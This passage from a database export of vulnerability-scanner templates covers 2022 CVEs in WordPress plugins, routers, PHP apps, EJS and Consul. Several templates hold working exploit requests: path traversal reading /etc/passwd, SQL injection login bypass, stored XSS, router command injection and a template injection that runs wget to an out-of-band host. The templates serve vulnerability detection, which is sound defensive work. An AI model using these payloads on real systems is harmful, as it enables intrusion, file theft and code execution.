cve,cve2022,wp,wpscan,seclists,packetstorm,authenticated,lfi,wordpress,wp-plugin,wpvivid\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n - |\n GET /wp-admin/admin.php?page=WPvivid HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 HTTP/1.1\n Host: {{Hostname}}\n Referer: {{BaseURL}}/wp-admin/admin.php?page=WPvivid\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: nonce\n group: 1\n regex:\n - '\"_ajax_nonce\":\"([0-9a-z]+)\"'\n internal: true\n part: body\n# digest: 4a0a00473045022100fbf116fc126c32cb636b41b96e4869401ddff061cb73fbccdef08cfaab0c1e8202205d457dcc5c48196ab73bbbe156a7df100c74e1dc1279c0467df579ebe105a8f1:922c64590222798bb761d5b6d8e72950", "hash": "17d9c6609e4c203523ab8bb418746344", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308500" }, "name": "CVE-2022-28923.yaml", "content": "id: CVE-2022-28923\n\ninfo:\n name: Caddy 2.4.6 - Open Redirect\n author: Sascha Brendel,DhiyaneshDk\n severity: medium\n description: |\n Caddy 2.4.6 contains an open redirect vulnerability. An attacker can redirect a user to a malicious site via a crafted URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability could lead to phishing attacks, credential theft,.\n remediation: |\n Upgrade Caddy to version 2.4.7 or later to mitigate the vulnerability.\n reference:\n - https://lednerb.de/en/publications/responsible-disclosure/caddy-open-redirect-vulnerability/\n - https://www.cve.org/CVERecord?id=CVE-2022-28923\n - https://github.com/caddyserver/caddy/issues/4502\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28923\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-28923\n cwe-id: CWE-601\n epss-score: 0.00772\n epss-percentile: 0.79353\n cpe: cpe:2.3:a:caddyserver:caddy:2.4.6:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: caddyserver\n product: caddy\n shodan-query: 'Server: caddy'\n tags: cve,cve2022,redirect,caddy,webserver,caddyserver\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/%5C%5Cinteract.sh/%252e%252e%252f'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 4a0a00473045022100cbebfeb89bd39b904defdde1f57d31bff6dc62ce5057431d24fc8b77bc0d112c0220191dac951237739b839a09a20d0824c2519de476ec4ce4f10ce40b121448cb63:922c64590222798bb761d5b6d8e72950", "hash": "f771641d79196e4d19179e587ffba68e", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308501" }, "name": "CVE-2022-28955.yaml", "content": "id: CVE-2022-28955\n\ninfo:\n name: D-Link DIR-816L - Improper Access Control\n author: arafatansari\n severity: high\n description: |\n D-Link DIR-816L_FW206b01 is susceptible to improper access control. An attacker can access folders folder_view.php and category_view.php and thereby possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information or control of the affected router.\n remediation: |\n Apply the latest firmware update provided by D-Link to fix the access control issue.\n reference:\n - https://github.com/shijin0925/IOT/blob/master/DIR816/1.md\n - https://www.dlink.com/en/security-bulletin/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-28955\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-28955\n cwe-id: CWE-287\n epss-score: 0.02487\n epss-percentile: 0.89836\n cpe: cpe:2.3:o:dlink:dir-816l_firmware:206b01:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: dlink\n product: dir-816l_firmware\n shodan-query: http.html:\"DIR-816L\"\n tags: cve2022,cve,dlink,exposure\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/category_view.php\"\n - \"{{BaseURL}}/folder_view.php\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - '<title>SharePort Web Access'\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022009d76438f14aca1cbc33ea695332b672ebdff31d2dba9171ba069cdf40c9b226022014e620a8fe211c0a70a706c03df6e4bd5961dff7ba59ca7bcb8c2c869e063a28:922c64590222798bb761d5b6d8e72950", "hash": "1508165ba70218c5770a72063e589dad", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308502" }, "name": "CVE-2022-29004.yaml", "content": "id: CVE-2022-29004\n\ninfo:\n name: Diary Management System 1.0 - Cross-Site Scripting\n author: TenBird\n severity: medium\n description: |\n Diary Management System 1.0 contains a cross-site scripting vulnerability via the Name parameter in search-result.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt\n - https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/\n - http://phpgurukul.com\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29004\n - https://github.com/manas3c/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29004\n cwe-id: CWE-79\n epss-score: 0.00218\n epss-percentile: 0.59134\n cpe: cpe:2.3:a:phpgurukul:e-diary_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: e-diary_management_system\n tags: cve2022,cve,xss,authenticated,edms,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /edms/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n logindetail={{username}}&userpassword={{password}}&login=\n - |\n POST /edms/search-result.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n searchdata=\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Serach Result Against \"'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d9e1bedfff4118b3279485a5986c26b55fb4f70309678e686a3a2f739891d72402210097dbc2e593923e391651673ae5b43eb1eb8fca5089adec8517b32b625de2b72e:922c64590222798bb761d5b6d8e72950", "hash": "c2f2355d54949b8630d5e34177fa86ce", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308503" }, "name": "CVE-2022-29005.yaml", "content": "id: CVE-2022-29005\n\ninfo:\n name: Online Birth Certificate System 1.2 - Stored Cross-Site Scripting\n author: TenBird\n severity: medium\n description: |\n Online Birth Certificate System 1.2 contains multiple stored cross-site scripting vulnerabilities in the component /obcs/user/profile.php, which allows an attacker to execute arbitrary web script or HTML via a crafted payload injected into the fname or lname parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the application, leading to potential data theft, session hijacking, or defacement of the website.\n remediation: |\n To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt\n - https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29005\n - http://online.com\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29005\n cwe-id: CWE-79\n epss-score: 0.0015\n epss-percentile: 0.51178\n cpe: cpe:2.3:a:phpgurukul:online_birth_certificate_system:1.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: phpgurukul\n product: online_birth_certificate_system\n tags: cve,cve2022,xss,obcs,authenticated,phpgurukul\nvariables:\n str: \"{{rand_base(6)}}\"\n\nhttp:\n - raw:\n - |\n POST /obcs/user/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n mobno={{username}}&password={{password}}&login=\n - |\n POST /obcs/user/profile.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n fname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname={{str}}%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=\n - |\n GET /obcs/user/dashboard.php HTTP/1.1\n Host: {{Hostname}}\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: dsl\n dsl:\n - 'contains(header_3, \"text/html\")'\n - 'status_code_3 == 200'\n - contains(body_3, 'admin-name\\\">{{str}}')\n condition: and\n# digest: 4a0a0047304502200260f1d81ea298c0298f44f3ef3ee75de3c2779b7870077c7a54c55526f150e6022100b1cfcd5b8d8da68b83cab3ce4e5bbf99f031a927741f508f1c641d219ffe5719:922c64590222798bb761d5b6d8e72950", "hash": "c4d7dfcf4d9916bf8234bb15ecdbe370", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308504" }, "name": "CVE-2022-29006.yaml", "content": "id: CVE-2022-29006\n\ninfo:\n name: Directory Management System 1.0 - SQL Injection\n author: TenBird\n severity: critical\n description: |\n Directory Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the Directory Management System 1.0.\n reference:\n - https://www.exploit-db.com/exploits/50370\n - https://phpgurukul.com/directory-management-system-using-php-and-mysql/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29006\n - https://github.com/sudoninja-noob/CVE-2022-29006/blob/main/CVE-2022-29006.txt\n - https://github.com/sudoninja-noob/CVE-2022-29006\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29006\n cwe-id: CWE-89\n epss-score: 0.21257\n epss-percentile: 0.96305\n cpe: cpe:2.3:a:phpgurukul:directory_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: directory_management_system\n tags: cve2022,cve,sqli,auth-bypass,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /admin/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username=admin' or '1'='1&password=1&login=login\n - |\n GET /admin/dashboard.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'DMS || Dashboard'\n - 'DMS Admin'\n - 'Admin Profile'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100b032a0928542b07c129e656f021862237782c6d5334e70b894ab4ebcca9585c4022100f96c4c46eee96e11abe556a475886c305dbe89a53f3ba87b4a652358759cead5:922c64590222798bb761d5b6d8e72950", "hash": "62717bab1f261fb505b96a5a60aa14bd", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308505" }, "name": "CVE-2022-29007.yaml", "content": "id: CVE-2022-29007\n\ninfo:\n name: Dairy Farm Shop Management System 1.0 - SQL Injection\n author: TenBird\n severity: critical\n description: |\n Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data manipulation, or data leakage.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50365\n - https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29007\n - https://github.com/sudoninja-noob/CVE-2022-29007/blob/main/CVE-2022-29007.txt\n - https://github.com/trhacknon/Pocingit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29007\n cwe-id: CWE-89\n epss-score: 0.15861\n epss-percentile: 0.95469\n cpe: cpe:2.3:a:phpgurukul:dairy_farm_shop_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: dairy_farm_shop_management_system\n tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /dfsms/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username=admin' or '1'='1&password=1&login=login\n - |\n GET /dfsms/add-category.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Add Product'\n - 'Admin'\n - 'DFSMS'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220552b4e4f1d6369c8da564385c27795297aaf3b1f860d3b125ab77765ac1032b60221009429073918c60b64bc35a1f86bcedf480353c7fc21d5f1363a841d0a24dd02d7:922c64590222798bb761d5b6d8e72950", "hash": "16d55049086a89662e33d11fc4a91228", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308506" }, "name": "CVE-2022-29009.yaml", "content": "id: CVE-2022-29009\n\ninfo:\n name: Cyber Cafe Management System 1.0 - SQL Injection\n author: TenBird\n severity: critical\n description: |\n Cyber Cafe Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50355\n - https://phpgurukul.com/cyber-cafe-management-system-using-php-mysql/\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29009\n - https://github.com/sudoninja-noob/CVE-2022-29009/blob/main/CVE-2022-29009.txt\n - https://github.com/manas3c/CVE-POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29009\n cwe-id: CWE-89\n epss-score: 0.21257\n epss-percentile: 0.96305\n cpe: cpe:2.3:a:phpgurukul:cyber_cafe_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: phpgurukul\n product: cyber_cafe_management_system\n tags: cve,cve2022,sqli,auth-bypass,edb,phpgurukul\n\nhttp:\n - raw:\n - |\n POST /ccms/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n username=%27+Or+1--+-&password=1&login=\n - |\n GET /ccms/dashboard.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'CCMS Admin Dashboard'\n - 'CCMS ADMIN | Admin'\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100c4332b09e1cc097f4cca16a0121cafbffab109672f9245168e86edf8bf26a0c902210099acc93d9117952cce48b5e857f1d8151fc10df6beebece0164404381d30a846:922c64590222798bb761d5b6d8e72950", "hash": "1f88ca37122ea8aa69a3f1f921a2bb8f", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308507" }, "name": "CVE-2022-29013.yaml", "content": "id: CVE-2022-29013\n\ninfo:\n name: Razer Sila Gaming Router - Remote Code Execution\n author: DhiyaneshDK\n severity: critical\n description: |\n A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request.\n reference:\n - https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29013\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29013\n cwe-id: CWE-78\n epss-score: 0.83254\n epss-percentile: 0.98361\n cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: razer\n product: sila_firmware\n tags: packetstorm,cve,cve2022,razer,sila,router\n\nhttp:\n - method: POST\n path:\n - \"{{BaseURL}}/ubus/\"\n headers:\n Origin: \"{{RootURL}}\"\n Referer: \"{{ROotURL}}\"\n X-Requested-With: XMLHttpRequest\n body: |\n {\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"30ebdc7dd1f519beb4b2175e9dd8463e\",\"file\",\"exec\",{\"command\":\"id\"}]}\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)'\n\n - type: word\n part: header\n words:\n - \"application/json\"\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402207cbb58a7c97c66bfec2ae1b2ea9efe5dd2c11d2f9ce7517c4f72aa7e6508b86002204dbae1299fc556dc6cc9ac476fb7c9c775c572f5aff45a220b6738b28985bd35:922c64590222798bb761d5b6d8e72950", "hash": "b9ec0768f752b3f620c6043acf196345", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308508" }, "name": "CVE-2022-29014.yaml", "content": "id: CVE-2022-29014\n\ninfo:\n name: Razer Sila Gaming Router 2.0.441_api-2.0.418 - Local File Inclusion\n author: edoardottt\n severity: high\n description: Razer Sila Gaming Router 2.0.441_api-2.0.418 is vulnerable to local file inclusion which could allow attackers to read arbitrary files.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to read sensitive files on the system.\n remediation: |\n Apply the latest firmware update provided by Razer to fix the Local File Inclusion vulnerability.\n reference:\n - https://www.exploit-db.com/exploits/50864\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29014\n - https://www2.razer.com/ap-en/desktops-and-networking/razer-sila\n - https://packetstormsecurity.com/files/166683/Razer-Sila-2.0.418-Local-File-Inclusion.html\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-29014\n epss-score: 0.77285\n epss-percentile: 0.98135\n cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: razer\n product: sila_firmware\n tags: cve,cve2022,edb,packetstorm,razer,lfi,router\n\nhttp:\n - raw:\n - |\n POST /ubus/ HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n {\"jsonrpc\":\"2.0\",\"id\":3,\"method\":\"call\",\"params\":[\"4183f72884a98d7952d953dd9439a1d1\",\"file\",\"read\",{\"path\":\"/etc/passwd\"}]}\n\n matchers-condition: and\n matchers:\n - type: regex\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100fa422597b17ed8103daea7b9b7c129502f25b691034e1c73b5e6f98089537455022042b8117c0c1f7a96f5dfed6a5cc2244e045d23ecfb50bd7a34715f8bf79b1d20:922c64590222798bb761d5b6d8e72950", "hash": "06f251cecf2af983cc1f81d2abe940c9", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308509" }, "name": "CVE-2022-29078.yaml", "content": "id: CVE-2022-29078\n\ninfo:\n name: Node.js Embedded JavaScript 3.1.6 - Template Injection\n author: For3stCo1d\n severity: critical\n description: |\n Node.js Embedded JavaScript 3.1.6 is susceptible to server-side template injection via settings[view options][outputFunctionName], which is parsed as an internal option and overwrites the outputFunctionName option with an arbitrary OS command, which is then executed upon template compilation.\n impact: |\n Remote code execution can lead to unauthorized access, data leakage, and complete system compromise.\n remediation: |\n Upgrade to a patched version of Node.js Embedded JavaScript (3.1.7 or higher) to mitigate the vulnerability.\n reference:\n - https://eslam.io/posts/ejs-server-side-template-injection-rce/\n - https://github.com/miko550/CVE-2022-29078\n - https://github.com/mde/ejs/commit/15ee698583c98dadc456639d6245580d17a24baf\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29078\n - https://github.com/mde/ejs/releases\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29078\n cwe-id: CWE-94\n epss-score: 0.34849\n epss-percentile: 0.97005\n cpe: cpe:2.3:a:ejs:ejs:3.1.6:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: ejs\n product: ejs\n framework: node.js\n tags: cve,cve2022,ssti,rce,ejs,nodejs,oast,intrusive,node.js\n\nhttp:\n - raw:\n - |\n GET /page?id={{randstr}}&settings[view%20options][outputFunctionName]=x;process.mainModule.require(%27child_process%27).execSync(%27wget+http://{{interactsh-url}}%27);s HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - http\n\n - type: word\n part: body\n words:\n - You are viewing page number\n# digest: 4a0a0047304502203db3f45d8e15e58d60c2a0c268f52014feead1fa99568158768c91a2580e313b022100efb19def318800319766279d5e0fbf144650bf5b861b85f3f6bfa291878bd107:922c64590222798bb761d5b6d8e72950", "hash": "aac512d273fdb362ebe3efeb25ea293b", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850a" }, "name": "CVE-2022-29153.yaml", "content": "id: CVE-2022-29153\n\ninfo:\n name: HashiCorp Consul/Consul Enterprise - Server-Side Request Forgery\n author: c-sh0\n severity: high\n description: |\n HashiCorp Consul and Consul Enterprise up to 1.9.16, 1.10.9, and 1.11 are susceptible to server-side request forgery. When redirects are returned by HTTP health check endpoints, Consul follows these HTTP redirects by default. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to send crafted requests to internal resources, leading to unauthorized access or information disclosure.\n remediation: 1) HTTP + interval health check configuration provides a disable_redirects option to prohibit this behavior. 2) Fixed in 1.9.17, 1.10.10, and 1.11.5.\n reference:\n - https://discuss.hashicorp.com/t/hcsec-2022-10-consul-s-http-health-check-may-allow-server-side-request-forgery/38393\n - https://github.com/hashicorp/consul/pull/12685\n - https://developer.hashicorp.com/consul/docs/discovery/checks\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29153\n - https://discuss.hashicorp.com\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-29153\n cwe-id: CWE-918\n epss-score: 0.02376\n epss-percentile: 0.89603\n cpe: cpe:2.3:a:hashicorp:consul:*:*:*:*:-:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: hashicorp\n product: consul\n shodan-query: title:\"Consul by HashiCorp\"\n tags: cve,cve2022,consul,hashicorp,ssrf,intrusive\n\nhttp:\n - raw:\n - | # register safe test node\n PUT /v1/agent/check/register HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n {\"id\":\"{{randstr}}\",\"name\":\"TEST NODE\",\"method\":\"GET\",\"http\":\"http://example.com\",\"interval\":\"10s\",\"timeout\":\"1s\",\"disable_redirects\":true}\n - | # deregister test node\n PUT /v1/agent/check/deregister/{{randstr}} HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/json\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - unknown field \"disable_redirects\"\n\n - type: status\n status:\n - 400\n# digest: 4a0a00473045022100ad57775f28b340323e6c238f83d7ff7d527ca0f9ea5bad34f1516a2ced3e64c7022057c3fb9256242477b86e3a94db3ab1e5b0992646c61019b6e2eb284ae7e03696:922c64590222798bb761d5b6d8e72950", "hash": "72542f52d694256bcc73ca2c26304d39", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850b" }, "name": "CVE-2022-29272.yaml", "content": "id: CVE-2022-29272\n\ninfo:\n name: Nagios XI <5.8.5 - Open Redirect\n author: ritikchaddha\n severity: medium\n description: |\n Nagios XI through 5.8.5 contains an open redirect vulnerability in the login function. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks.\n remediation: |\n Upgrade Nagios XI to version 5.8.5 or later to mitigate the vulnerability.\n reference:\n - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272\n - https://github.com/4LPH4-NL/CVEs\n - https://github.com/sT0wn-nl/CVEs/blob/master/README.md#nagios-xi\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29272\n - https://assets.nagios.com/downloads/nagiosxi/CHANGES-5.TXT\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29272\n cwe-id: CWE-601\n epss-score: 0.0033\n epss-percentile: 0.67975\n cpe: cpe:2.3:a:nagios:nagios_xi:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: nagios\n product: nagios_xi\n tags: cve,cve2022,redirect,nagios,nagiosxi\n\nhttp:\n - raw:\n - |\n GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /nagiosxi/login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login\n\n host-redirects: true\n max-redirects: 2\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n\n extractors:\n - type: regex\n name: nsp_token\n group: 1\n regex:\n - ''\n - \"\"\n internal: true\n part: body\n# digest: 4a0a00473045022100cbdf04a44be30b745acc991c58c7b30bd5887bf49b11309c5a3e02a096fa0d0a0220210e11532a685f0239900f6aab1e5862ec23a6a9c30af08dda63ee08c7bd2ad2:922c64590222798bb761d5b6d8e72950", "hash": "3641032d6d7a7443cc98280d5e229c3a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850c" }, "name": "CVE-2022-29298.yaml", "content": "id: CVE-2022-29298\n\ninfo:\n name: SolarView Compact 6.00 - Local File Inclusion\n author: ritikchaddha\n severity: high\n description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, including configuration files, credentials, and other sensitive data.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in SolarView Compact 6.00.\n reference:\n - https://www.exploit-db.com/exploits/50950\n - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view\n - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29298\n - https://github.com/20142995/pocsuite3\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2022-29298\n cwe-id: CWE-22\n epss-score: 0.1374\n epss-percentile: 0.95497\n cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contec\n product: sv-cpt-mc310_firmware\n shodan-query: http.html:\"SolarView Compact\"\n tags: cve,cve2022,lfi,solarview,edb,contec\n\nhttp:\n - method: 